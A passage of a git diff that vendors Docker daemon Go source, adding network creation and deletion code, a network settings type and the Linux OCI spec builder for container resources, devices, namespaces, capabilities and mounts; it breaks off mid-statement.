net.ParseCIDR(nodeIP) + if err != nil { + return err + } + + go func() { + controller := daemon.netController + controller.AgentInitWait() + + if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID { + if err := controller.SandboxDestroy("ingress-sbox"); err != nil { + logrus.Errorf("Failed to delete stale ingress sandbox: %v", err) + return + } + + // Cleanup any stale endpoints that might be left over during previous iterations + epList := n.Endpoints() + for _, ep := range epList { + if err := ep.Delete(true); err != nil { + logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err) + } + } + + if err := n.Delete(); err != nil { + logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err) + return + } + } + + if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { + // If it is any other error other than already + // exists error log error and return. + if _, ok := err.(libnetwork.NetworkNameError); !ok { + logrus.Errorf("Failed creating ingress network: %v", err) + return + } + + // Otherwise continue down the call to create or recreate sandbox. + } + + n, err := daemon.GetNetworkByID(create.ID) + if err != nil { + logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + return + } + + sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress()) + if err != nil { + if _, ok := err.(networktypes.ForbiddenError); !ok { + logrus.Errorf("Failed creating ingress sandbox: %v", err) + } + return + } + + ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil)) + if err != nil { + logrus.Errorf("Failed creating ingress endpoint: %v", err) + return + } + + if err := ep.Join(sb, nil); err != nil { + logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err) + } + + if err := sb.EnableService(); err != nil { + logrus.WithError(err).Error("Failed enabling service for ingress sandbox") + } + }() + + return nil +} + +// SetNetworkBootstrapKeys sets the bootstrap keys. +func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error { + return daemon.netController.SetKeys(keys) +} + +// UpdateAttachment notifies the attacher about the attachment config. +func (daemon *Daemon) UpdateAttachment(networkName, networkID, containerID string, config *network.NetworkingConfig) error { + if daemon.clusterProvider == nil { + return fmt.Errorf("cluster provider is not initialized") + } + + if err := daemon.clusterProvider.UpdateAttachment(networkName, containerID, config); err != nil { + return daemon.clusterProvider.UpdateAttachment(networkID, containerID, config) + } + + return nil +} + +// WaitForDetachment makes the cluster manager wait for detachment of +// the container from the network. +func (daemon *Daemon) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { + if daemon.clusterProvider == nil { + return fmt.Errorf("cluster provider is not initialized") + } + + return daemon.clusterProvider.WaitForDetachment(ctx, networkName, networkID, taskID, containerID) +} + +// CreateManagedNetwork creates an agent network. +func (daemon *Daemon) CreateManagedNetwork(create clustertypes.NetworkCreateRequest) error { + _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true) + return err +} + +// CreateNetwork creates a network with the given name, driver and other optional parameters +func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.NetworkCreateResponse, error) { + resp, err := daemon.createNetwork(create, "", false) + if err != nil { + return nil, err + } + return resp, err +} + +func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) { + // If there is a pending ingress network creation wait here + // since ingress network creation can happen via node download + // from manager or task download. + if isIngressNetwork(create.Name) { + defer ingressWait()() + } + + if runconfig.IsPreDefinedNetwork(create.Name) && !agent { + err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name) + return nil, apierrors.NewRequestForbiddenError(err) + } + + var warning string + nw, err := daemon.GetNetworkByName(create.Name) + if err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok { + return nil, err + } + } + if nw != nil { + if create.CheckDuplicate { + return nil, libnetwork.NetworkNameError(create.Name) + } + warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID()) + } + + c := daemon.netController + driver := create.Driver + if driver == "" { + driver = c.Config().Daemon.DefaultDriver + } + + nwOptions := []libnetwork.NetworkOption{ + libnetwork.NetworkOptionEnableIPv6(create.EnableIPv6), + libnetwork.NetworkOptionDriverOpts(create.Options), + libnetwork.NetworkOptionLabels(create.Labels), + libnetwork.NetworkOptionAttachable(create.Attachable), + } + + if create.IPAM != nil { + ipam := create.IPAM + v4Conf, v6Conf, err := getIpamConfig(ipam.Config) + if err != nil { + return nil, err + } + nwOptions = append(nwOptions, libnetwork.NetworkOptionIpam(ipam.Driver, "", v4Conf, v6Conf, ipam.Options)) + } + + if create.Internal { + nwOptions = append(nwOptions, libnetwork.NetworkOptionInternalNetwork()) + } + if agent { + nwOptions = append(nwOptions, libnetwork.NetworkOptionDynamic()) + nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false)) + } + + if isIngressNetwork(create.Name) { + nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress()) + } + + n, err := c.NewNetwork(driver, create.Name, id, nwOptions...) + if err != nil { + return nil, err + } + + daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE) + if create.IPAM != nil { + daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE) + } + daemon.LogNetworkEvent(n, "create") + + return &types.NetworkCreateResponse{ + ID: n.ID(), + Warning: warning, + }, nil +} + +func (daemon *Daemon) pluginRefCount(driver, capability string, mode int) { + var builtinDrivers []string + + if capability == driverapi.NetworkPluginEndpointType { + builtinDrivers = daemon.netController.BuiltinDrivers() + } else if capability == ipamapi.PluginEndpointType { + builtinDrivers = daemon.netController.BuiltinIPAMDrivers() + } + + for _, d := range builtinDrivers { + if d == driver { + return + } + } + + if daemon.PluginStore != nil { + _, err := daemon.PluginStore.Get(driver, capability, mode) + if err != nil { + logrus.WithError(err).WithFields(logrus.Fields{"mode": mode, "driver": driver}).Error("Error handling plugin refcount operation") + } + } +} + +func getIpamConfig(data []network.IPAMConfig) ([]*libnetwork.IpamConf, []*libnetwork.IpamConf, error) { + ipamV4Cfg := []*libnetwork.IpamConf{} + ipamV6Cfg := []*libnetwork.IpamConf{} + for _, d := range data { + iCfg := libnetwork.IpamConf{} + iCfg.PreferredPool = d.Subnet + iCfg.SubPool = d.IPRange + iCfg.Gateway = d.Gateway + iCfg.AuxAddresses = d.AuxAddress + ip, _, err := net.ParseCIDR(d.Subnet) + if err != nil { + return nil, nil, fmt.Errorf("Invalid subnet %s : %v", d.Subnet, err) + } + if ip.To4() != nil { + ipamV4Cfg = append(ipamV4Cfg, &iCfg) + } else { + ipamV6Cfg = append(ipamV6Cfg, &iCfg) + } + } + return ipamV4Cfg, ipamV6Cfg, nil +} + +// UpdateContainerServiceConfig updates a service configuration. +func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + + container.NetworkSettings.Service = serviceConfig + return nil +} + +// ConnectContainerToNetwork connects the given container to the given +// network. If either cannot be found, an err is returned. If the +// network cannot be set up, an err is returned. +func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error { + if runtime.GOOS == "solaris" { + return errors.New("docker network connect is unsupported on Solaris platform") + } + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + return daemon.ConnectToNetwork(container, networkName, endpointConfig) +} + +// DisconnectContainerFromNetwork disconnects the given container from +// the given network. If either cannot be found, an err is returned. +func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error { + if runtime.GOOS == "solaris" { + return errors.New("docker network disconnect is unsupported on Solaris platform") + } + container, err := daemon.GetContainer(containerName) + if err != nil { + if force { + return daemon.ForceEndpointDelete(containerName, networkName) + } + return err + } + return daemon.DisconnectFromNetwork(container, networkName, force) +} + +// GetNetworkDriverList returns the list of plugins drivers +// registered for network. +func (daemon *Daemon) GetNetworkDriverList() []string { + if !daemon.NetworkControllerEnabled() { + return nil + } + + pluginList := daemon.netController.BuiltinDrivers() + + managedPlugins := daemon.PluginStore.GetAllManagedPluginsByCap(driverapi.NetworkPluginEndpointType) + + for _, plugin := range managedPlugins { + pluginList = append(pluginList, plugin.Name()) + } + + pluginMap := make(map[string]bool) + for _, plugin := range pluginList { + pluginMap[plugin] = true + } + + networks := daemon.netController.Networks() + + for _, network := range networks { + if !pluginMap[network.Type()] { + pluginList = append(pluginList, network.Type()) + pluginMap[network.Type()] = true + } + } + + sort.Strings(pluginList) + + return pluginList +} + +// DeleteManagedNetwork deletes an agent network. +func (daemon *Daemon) DeleteManagedNetwork(networkID string) error { + return daemon.deleteNetwork(networkID, true) +} + +// DeleteNetwork destroys a network unless it's one of docker's predefined networks. +func (daemon *Daemon) DeleteNetwork(networkID string) error { + return daemon.deleteNetwork(networkID, false) +} + +func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error { + nw, err := daemon.FindNetwork(networkID) + if err != nil { + return err + } + + if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic { + err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name()) + return apierrors.NewRequestForbiddenError(err) + } + + if err := nw.Delete(); err != nil { + return err + } + daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE) + ipamType, _, _, _ := nw.Info().IpamConfig() + daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE) + daemon.LogNetworkEvent(nw, "destroy") + return nil +} + +// GetNetworks returns a list of all networks +func (daemon *Daemon) GetNetworks() []libnetwork.Network { + return daemon.getAllNetworks() +} + +// clearAttachableNetworks removes the attachable networks +// after disconnecting any connected container +func (daemon *Daemon) clearAttachableNetworks() { + for _, n := range daemon.GetNetworks() { + if !n.Info().Attachable() { + continue + } + for _, ep := range n.Endpoints() { + epInfo := ep.Info() + if epInfo == nil { + continue + } + sb := epInfo.Sandbox() + if sb == nil { + continue + } + containerID := sb.ContainerID() + if err := daemon.DisconnectContainerFromNetwork(containerID, n.ID(), true); err != nil { + logrus.Warnf("Failed to disconnect container %s from swarm network %s on cluster leave: %v", + containerID, n.Name(), err) + } + } + if err := daemon.DeleteManagedNetwork(n.ID()); err != nil { + logrus.Warnf("Failed to remove swarm network %s on cluster leave: %v", n.Name(), err) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go new file mode 100644 index 0000000000..8f6b7dd59e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/network/settings.go @@ -0,0 +1,33 @@ +package network + +import ( + networktypes "github.com/docker/docker/api/types/network" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/go-connections/nat" +) + +// Settings stores configuration details about the daemon network config +// TODO Windows. Many of these fields can be factored out., +type Settings struct { + Bridge string + SandboxID string + HairpinMode bool + LinkLocalIPv6Address string + LinkLocalIPv6PrefixLen int + Networks map[string]*EndpointSettings + Service *clustertypes.ServiceConfig + Ports nat.PortMap + SandboxKey string + SecondaryIPAddresses []networktypes.Address + SecondaryIPv6Addresses []networktypes.Address + IsAnonymousEndpoint bool + HasSwarmEndpoint bool +} + +// EndpointSettings is a package local wrapper for +// networktypes.EndpointSettings which stores Endpoint state that +// needs to be persisted to disk but not exposed in the api. +type EndpointSettings struct { + *networktypes.EndpointSettings + IPAMOperational bool +} diff --git a/vendor/github.com/docker/docker/daemon/oci_linux.go b/vendor/github.com/docker/docker/daemon/oci_linux.go new file mode 100644 index 0000000000..a72b0b873d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_linux.go @@ -0,0 +1,790 @@ +package daemon + +import ( + "fmt" + "io" + "os" + "os/exec" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/volume" + "github.com/opencontainers/runc/libcontainer/apparmor" + "github.com/opencontainers/runc/libcontainer/cgroups" + "github.com/opencontainers/runc/libcontainer/devices" + "github.com/opencontainers/runc/libcontainer/user" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func setResources(s *specs.Spec, r containertypes.Resources) error { + weightDevices, err := getBlkioWeightDevices(r) + if err != nil { + return err + } + readBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadBps) + if err != nil { + return err + } + writeBpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteBps) + if err != nil { + return err + } + readIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceReadIOps) + if err != nil { + return err + } + writeIOpsDevice, err := getBlkioThrottleDevices(r.BlkioDeviceWriteIOps) + if err != nil { + return err + } + + memoryRes := getMemoryResources(r) + cpuRes := getCPUResources(r) + blkioWeight := r.BlkioWeight + + specResources := &specs.Resources{ + Memory: memoryRes, + CPU: cpuRes, + BlockIO: &specs.BlockIO{ + Weight: &blkioWeight, + WeightDevice: weightDevices, + ThrottleReadBpsDevice: readBpsDevice, + ThrottleWriteBpsDevice: writeBpsDevice, + ThrottleReadIOPSDevice: readIOpsDevice, + ThrottleWriteIOPSDevice: writeIOpsDevice, + }, + DisableOOMKiller: r.OomKillDisable, + Pids: &specs.Pids{ + Limit: &r.PidsLimit, + }, + } + + if s.Linux.Resources != nil && len(s.Linux.Resources.Devices) > 0 { + specResources.Devices = s.Linux.Resources.Devices + } + + s.Linux.Resources = specResources + return nil +} + +func setDevices(s *specs.Spec, c *container.Container) error { + // Build lists of devices allowed and created within the container. + var devs []specs.Device + devPermissions := s.Linux.Resources.Devices + if c.HostConfig.Privileged { + hostDevices, err := devices.HostDevices() + if err != nil { + return err + } + for _, d := range hostDevices { + devs = append(devs, oci.Device(d)) + } + rwm := "rwm" + devPermissions = []specs.DeviceCgroup{ + { + Allow: true, + Access: &rwm, + }, + } + } else { + for _, deviceMapping := range c.HostConfig.Devices { + d, dPermissions, err := oci.DevicesFromPath(deviceMapping.PathOnHost, deviceMapping.PathInContainer, deviceMapping.CgroupPermissions) + if err != nil { + return err + } + devs = append(devs, d...) + devPermissions = append(devPermissions, dPermissions...) + } + } + + s.Linux.Devices = append(s.Linux.Devices, devs...) + s.Linux.Resources.Devices = devPermissions + return nil +} + +func setRlimits(daemon *Daemon, s *specs.Spec, c *container.Container) error { + var rlimits []specs.Rlimit + + // We want to leave the original HostConfig alone so make a copy here + hostConfig := *c.HostConfig + // Merge with the daemon defaults + daemon.mergeUlimits(&hostConfig) + for _, ul := range hostConfig.Ulimits { + rlimits = append(rlimits, specs.Rlimit{ + Type: "RLIMIT_" + strings.ToUpper(ul.Name), + Soft: uint64(ul.Soft), + Hard: uint64(ul.Hard), + }) + } + + s.Process.Rlimits = rlimits + return nil +} + +func setUser(s *specs.Spec, c *container.Container) error { + uid, gid, additionalGids, err := getUser(c, c.Config.User) + if err != nil { + return err + } + s.Process.User.UID = uid + s.Process.User.GID = gid + s.Process.User.AdditionalGids = additionalGids + return nil +} + +func readUserFile(c *container.Container, p string) (io.ReadCloser, error) { + fp, err := symlink.FollowSymlinkInScope(filepath.Join(c.BaseFS, p), c.BaseFS) + if err != nil { + return nil, err + } + return os.Open(fp) +} + +func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { + passwdPath, err := user.GetPasswdPath() + if err != nil { + return 0, 0, nil, err + } + groupPath, err := user.GetGroupPath() + if err != nil { + return 0, 0, nil, err + } + passwdFile, err := readUserFile(c, passwdPath) + if err == nil { + defer passwdFile.Close() + } + groupFile, err := readUserFile(c, groupPath) + if err == nil { + defer groupFile.Close() + } + + execUser, err := user.GetExecUser(username, nil, passwdFile, groupFile) + if err != nil { + return 0, 0, nil, err + } + + // todo: fix this double read by a change to libcontainer/user pkg + groupFile, err = readUserFile(c, groupPath) + if err == nil { + defer groupFile.Close() + } + var addGroups []int + if len(c.HostConfig.GroupAdd) > 0 { + addGroups, err = user.GetAdditionalGroups(c.HostConfig.GroupAdd, groupFile) + if err != nil { + return 0, 0, nil, err + } + } + uid := uint32(execUser.Uid) + gid := uint32(execUser.Gid) + sgids := append(execUser.Sgids, addGroups...) + var additionalGids []uint32 + for _, g := range sgids { + additionalGids = append(additionalGids, uint32(g)) + } + return uid, gid, additionalGids, nil +} + +func setNamespace(s *specs.Spec, ns specs.Namespace) { + for i, n := range s.Linux.Namespaces { + if n.Type == ns.Type { + s.Linux.Namespaces[i] = ns + return + } + } + s.Linux.Namespaces = append(s.Linux.Namespaces, ns) +} + +func setCapabilities(s *specs.Spec, c *container.Container) error { + var caplist []string + var err error + if c.HostConfig.Privileged { + caplist = caps.GetAllCapabilities() + } else { + caplist, err = caps.TweakCapabilities(s.Process.Capabilities, c.HostConfig.CapAdd, c.HostConfig.CapDrop) + if err != nil { + return err + } + } + s.Process.Capabilities = caplist + return nil +} + +func setNamespaces(daemon *Daemon, s *specs.Spec, c *container.Container) error { + userNS := false + // user + if c.HostConfig.UsernsMode.IsPrivate() { + uidMap, gidMap := daemon.GetUIDGIDMaps() + if uidMap != nil { + userNS = true + ns := specs.Namespace{Type: "user"} + setNamespace(s, ns) + s.Linux.UIDMappings = specMapping(uidMap) + s.Linux.GIDMappings = specMapping(gidMap) + } + } + // network + if !c.Config.NetworkDisabled { + ns := specs.Namespace{Type: "network"} + parts := strings.SplitN(string(c.HostConfig.NetworkMode), ":", 2) + if parts[0] == "container" { + nc, err := daemon.getNetworkedContainer(c.ID, c.HostConfig.NetworkMode.ConnectedContainer()) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/net", nc.State.GetPID()) + if userNS { + // to share a net namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", nc.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.NetworkMode.IsHost() { + ns.Path = c.NetworkSettings.SandboxKey + } + setNamespace(s, ns) + } + // ipc + if c.HostConfig.IpcMode.IsContainer() { + ns := specs.Namespace{Type: "ipc"} + ic, err := daemon.getIpcContainer(c) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/ipc", ic.State.GetPID()) + setNamespace(s, ns) + if userNS { + // to share an IPC namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", ic.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.IpcMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("ipc")) + } else { + ns := specs.Namespace{Type: "ipc"} + setNamespace(s, ns) + } + // pid + if c.HostConfig.PidMode.IsContainer() { + ns := specs.Namespace{Type: "pid"} + pc, err := daemon.getPidContainer(c) + if err != nil { + return err + } + ns.Path = fmt.Sprintf("/proc/%d/ns/pid", pc.State.GetPID()) + setNamespace(s, ns) + if userNS { + // to share a PID namespace, they must also share a user namespace + nsUser := specs.Namespace{Type: "user"} + nsUser.Path = fmt.Sprintf("/proc/%d/ns/user", pc.State.GetPID()) + setNamespace(s, nsUser) + } + } else if c.HostConfig.PidMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("pid")) + } else { + ns := specs.Namespace{Type: "pid"} + setNamespace(s, ns) + } + // uts + if c.HostConfig.UTSMode.IsHost() { + oci.RemoveNamespace(s, specs.NamespaceType("uts")) + s.Hostname = "" + } + + return nil +} + +func specMapping(s []idtools.IDMap) []specs.IDMapping { + var ids []specs.IDMapping + for _, item := range s { + ids = append(ids, specs.IDMapping{ + HostID: uint32(item.HostID), + ContainerID: uint32(item.ContainerID), + Size: uint32(item.Size), + }) + } + return ids +} + +func getMountInfo(mountinfo []*mount.Info, dir string) *mount.Info { + for _, m := range mountinfo { + if m.Mountpoint == dir { + return m + } + } + return nil +} + +// Get the source mount point of directory passed in as argument. Also return +// optional fields. +func getSourceMount(source string) (string, string, error) { + // Ensure any symlinks are resolved. + sourcePath, err := filepath.EvalSymlinks(source) + if err != nil { + return "", "", err + } + + mountinfos, err := mount.GetMounts() + if err != nil { + return "", "", err + } + + mountinfo := getMountInfo(mountinfos, sourcePath) + if mountinfo != nil { + return sourcePath, mountinfo.Optional, nil + } + + path := sourcePath + for { + path = filepath.Dir(path) + + mountinfo = getMountInfo(mountinfos, path) + if mountinfo != nil { + return path, mountinfo.Optional, nil + } + + if path == "/" { + break + } + } + + // If we are here, we did not find parent mount. Something is wrong. + return "", "", fmt.Errorf("Could not find source mount of %s", source) +} + +// Ensure mount point on which path is mounted, is shared. +func ensureShared(path string) error { + sharedMount := false + + sourceMount, optionalOpts, err := getSourceMount(path) + if err != nil { + return err + } + // Make sure source mount point is shared. + optsSplit := strings.Split(optionalOpts, " ") + for _, opt := range optsSplit { + if strings.HasPrefix(opt, "shared:") { + sharedMount = true + break + } + } + + if !sharedMount { + return fmt.Errorf("Path %s is mounted on %s but it is not a shared mount.", path, sourceMount) + } + return nil +} + +// Ensure mount point on which path is mounted, is either shared or slave. +func ensureSharedOrSlave(path string) error { + sharedMount := false + slaveMount := false + + sourceMount, optionalOpts, err := getSourceMount(path) + if err != nil { + return err + } + // Make sure source mount point is shared. + optsSplit := strings.Split(optionalOpts, " ") + for _, opt := range optsSplit { + if strings.HasPrefix(opt, "shared:") { + sharedMount = true + break + } else if strings.HasPrefix(opt, "master:") { + slaveMount = true + break + } + } + + if !sharedMount && !slaveMount { + return fmt.Errorf("Path %s is mounted on %s but it is not a shared or slave mount.", path, sourceMount) + } + return nil +} + +var ( + mountPropagationMap = map[string]int{ + "private": mount.PRIVATE, + "rprivate": mount.RPRIVATE, + "shared": mount.SHARED, + "rshared": mount.RSHARED, + "slave": mount.SLAVE, + "rslave": mount.RSLAVE, + } + + mountPropagationReverseMap = map[int]string{ + mount.PRIVATE: "private", + mount.RPRIVATE: "rprivate", + mount.SHARED: "shared", + mount.RSHARED: "rshared", + mount.SLAVE: "slave", + mount.RSLAVE: "rslave", + } +) + +func setMounts(daemon *Daemon, s *specs.Spec, c *container.Container, mounts []container.Mount) error { + userMounts := make(map[string]struct{}) + for _, m := range mounts { + userMounts[m.Destination] = struct{}{} + } + + // Filter out mounts that are overridden by user supplied mounts + var defaultMounts []specs.Mount + _, mountDev := userMounts["/dev"] + for _, m := range s.Mounts { + if _, ok := userMounts[m.Destination]; !ok { + if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + continue + } + defaultMounts = append(defaultMounts, m) + } + } + + s.Mounts = defaultMounts + for _, m := range mounts { + for _, cm := range s.Mounts { + if cm.Destination == m.Destination { + return fmt.Errorf("Duplicate mount point '%s'", m.Destination) + } + } + + if m.Source == "tmpfs" { + data := m.Data + options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)} + if data != "" { + options = append(options, strings.Split(data, ",")...) + } + + merged, err := mount.MergeTmpfsOptions(options) + if err != nil { + return err + } + + s.Mounts = append(s.Mounts, specs.Mount{Destination: m.Destination, Source: m.Source, Type: "tmpfs", Options: merged}) + continue + } + + mt := specs.Mount{Destination: m.Destination, Source: m.Source, Type: "bind"} + + // Determine property of RootPropagation based on volume + // properties. If a volume is shared, then keep root propagation + // shared. This should work for slave and private volumes too. + // + // For slave volumes, it can be either [r]shared/[r]slave. + // + // For private volumes any root propagation value should work. + pFlag := mountPropagationMap[m.Propagation] + if pFlag == mount.SHARED || pFlag == mount.RSHARED { + if err := ensureShared(m.Source); err != nil { + return err + } + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED] + } + } else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE { + if err := ensureSharedOrSlave(m.Source); err != nil { + return err + } + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + } + } + + opts := []string{"rbind"} + if !m.Writable { + opts = append(opts, "ro") + } + if pFlag != 0 { + opts = append(opts, mountPropagationReverseMap[pFlag]) + } + + mt.Options = opts + s.Mounts = append(s.Mounts, mt) + } + + if s.Root.Readonly { + for i, m := range s.Mounts { + switch m.Destination { + case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc + continue + } + if _, ok := userMounts[m.Destination]; !ok { + if !stringutils.InSlice(m.Options, "ro") { + s.Mounts[i].Options = append(s.Mounts[i].Options, "ro") + } + } + } + } + + if c.HostConfig.Privileged { + if !s.Root.Readonly { + // clear readonly for /sys + for i := range s.Mounts { + if s.Mounts[i].Destination == "/sys" { + clearReadOnly(&s.Mounts[i]) + } + } + } + s.Linux.ReadonlyPaths = nil + s.Linux.MaskedPaths = nil + } + + // TODO: until a kernel/mount solution exists for handling remount in a user namespace, + // we must clear the readonly flag for the cgroups mount (@mrunalp concurs) + if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged { + for i, m := range s.Mounts { + if m.Type == "cgroup" { + clearReadOnly(&s.Mounts[i]) + } + } + } + + return nil +} + +func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return err + } + s.Root = specs.Root{ + Path: c.BaseFS, + Readonly: c.HostConfig.ReadonlyRootfs, + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + cwd := c.Config.WorkingDir + if len(cwd) == 0 { + cwd = "/" + } + s.Process.Args = append([]string{c.Path}, c.Args...) + + // only add the custom init if it is specified and the container is running in its + // own private pid namespace. It does not make sense to add if it is running in the + // host namespace or another container's pid namespace where we already have an init + if c.HostConfig.PidMode.IsPrivate() { + if (c.HostConfig.Init != nil && *c.HostConfig.Init) || + (c.HostConfig.Init == nil && daemon.configStore.Init) { + s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...) + var path string + if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" { + path, err = exec.LookPath(DefaultInitBinary) + if err != nil { + return err + } + } + if daemon.configStore.InitPath != "" { + path = daemon.configStore.InitPath + } + if c.HostConfig.InitPath != "" { + path = c.HostConfig.InitPath + } + s.Mounts = append(s.Mounts, specs.Mount{ + Destination: "/dev/init", + Type: "bind", + Source: path, + Options: []string{"bind", "ro"}, + }) + } + } + s.Process.Cwd = cwd + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.Terminal = c.Config.Tty + s.Hostname = c.FullHostname() + + return nil +} + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + if err := daemon.populateCommonSpec(&s, c); err != nil { + return nil, err + } + + var cgroupsPath string + scopePrefix := "docker" + parent := "/docker" + useSystemd := UsingSystemd(daemon.configStore) + if useSystemd { + parent = "system.slice" + } + + if c.HostConfig.CgroupParent != "" { + parent = c.HostConfig.CgroupParent + } else if daemon.configStore.CgroupParent != "" { + parent = daemon.configStore.CgroupParent + } + + if useSystemd { + cgroupsPath = parent + ":" + scopePrefix + ":" + c.ID + logrus.Debugf("createSpec: cgroupsPath: %s", cgroupsPath) + } else { + cgroupsPath = filepath.Join(parent, c.ID) + } + s.Linux.CgroupsPath = &cgroupsPath + + if err := setResources(&s, c.HostConfig.Resources); err != nil { + return nil, fmt.Errorf("linux runtime spec resources: %v", err) + } + s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj + s.Linux.Sysctl = c.HostConfig.Sysctls + + p := *s.Linux.CgroupsPath + if useSystemd { + initPath, err := cgroups.GetInitCgroupDir("cpu") + if err != nil { + return nil, err + } + p, _ = cgroups.GetThisCgroupDir("cpu") + if err != nil { + return nil, err + } + p = filepath.Join(initPath, p) + } + + // Clean path to guard against things like ../../../BAD + parentPath := filepath.Dir(p) + if !filepath.IsAbs(parentPath) { + parentPath = filepath.Clean("/" + parentPath) + } + + if err := daemon.initCgroupsPath(parentPath); err != nil { + return nil, fmt.Errorf("linux init cgroups path: %v", err) + } + if err := setDevices(&s, c); err != nil { + return nil, fmt.Errorf("linux runtime spec devices: %v", err) + } + if err := setRlimits(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux runtime spec rlimits: %v", err) + } + if err := setUser(&s, c); err != nil { + return nil, fmt.Errorf("linux spec user: %v", err) + } + if err := setNamespaces(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux spec namespaces: %v", err) + } + if err := setCapabilities(&s, c); err != nil { + return nil, fmt.Errorf("linux spec capabilities: %v", err) + } + if err := setSeccomp(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux seccomp: %v", err) + } + + if err := daemon.setupIpcDirs(c); err != nil { + return nil, err + } + + if err := daemon.setupSecretDir(c); err != nil { + return nil, err + } + + ms, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + + ms = append(ms, c.IpcMounts()...) + + tmpfsMounts, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + ms = append(ms, tmpfsMounts...) + + if m := c.SecretMount(); m != nil { + ms = append(ms, *m) + } + + sort.Sort(mounts(ms)) + if err := setMounts(daemon, &s, c, ms); err != nil { + return nil, fmt.Errorf("linux mounts: %v", err) + } + + for _, ns := range s.Linux.Namespaces { + if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled { + target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe")) + if err != nil { + return nil, err + } + + s.Hooks = 